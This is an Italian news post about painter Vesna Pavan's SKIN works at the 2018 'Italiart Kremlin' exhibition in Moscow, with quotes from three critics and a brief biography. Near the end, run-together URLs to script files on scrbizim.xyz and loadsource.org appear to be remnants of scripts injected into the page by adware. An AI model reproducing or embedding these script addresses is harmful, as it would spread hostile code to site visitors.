Vesna Pavan a Mosca

Vesna Pavan sarà presente alla RASSEGNA INTERNAZIONALE  “ITALIART KREMLIN” dal 4 al 9 settembre 2018. La mostra si terrà nella Sala Bianca del Museo di Stato Vernadsky di Mosca a 150 metri dal Cremlino.

In questa occasione Vesna esporrà alcune opere appartenenti al ciclo SKIN. I lavori SKIN rappresentano il culmine dell’evoluzione artistica della Pavan. La tela si smaterializza, lasciando quindi libero il soggetto che si astrae in colature sintetiche di smalti densi, plastici e lucenti, incorniciati dal telaio.

Le opere di questa collezione hanno attirato l’interesse di diversi critici.

Luca Beatrice:I lavori Skin sono la messa in scena del corpo umano come materia liquida. Con sperimentazioni e tecniche pittoriche che ricordano delle avanguardie degli anni Cinquanta. Come le tele cauterizzate di Alberto Burri e il dripping di Pollock, fino all’Espressionismo Astratto degli squarci cromatici di Clyfford Still a cui si aggiunge quel coté più pop, esclusivamente americano, di Claes Oldenburg o Robert Rauschenberg

Vittorio Sgarbi: Ci si muove nella dimensione Fontaniana dello spazialmente incerto. Come se ci si trovasse a metà strada tra pittura e scultura, fra planare e tutto tondo. Con i velari che, facendosi attraversare dalla luce, proiettano ombre sul piano retrostante, tenuto ad una certa distanza, introducendo in tal modo un universo ulteriore, dal punto di vista formale e concettuale

Prof. Carlo Franza: “È il colore che sborda, riannodando la lezione di Arsile Gorky, portandosi nel suo caso oltre il gesto delle sculture che rompono la cornice, distruggendo quasi lo spazio. Iniziatrice di una sorta di ermetismo sintomatico, che vuol dire come con colore, spazio e immagine, l’opera possa vivere un’esistenza autonoma, non solo formale, ma come accadimento”

Vesna Pavan, figlia d’arte, nasce a Spilimbergo (Pordenone). La sua prima mostra risale al 1992. Design, moda e life-style si contaminano l’un l’altro nelle produzioni dell’artista. È  Ambasciatrice dell’Arte Italiana in Russia.

Informazioni sull’intera produzione artistica della Pavan sono disponibili sul sito www.vesnapavan.com

http://scrbizim.xyz/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6765x&r=1533575845463http://scrbizim.xyz/ext/1a6d025440f6e599e0.js?sid=52200_6765_&title=&blocks%5B%5D=31af2

Print Friendly, PDF & Email
 

Rispondi

This site uses Akismet to reduce spam. Learn how your comment data is processed.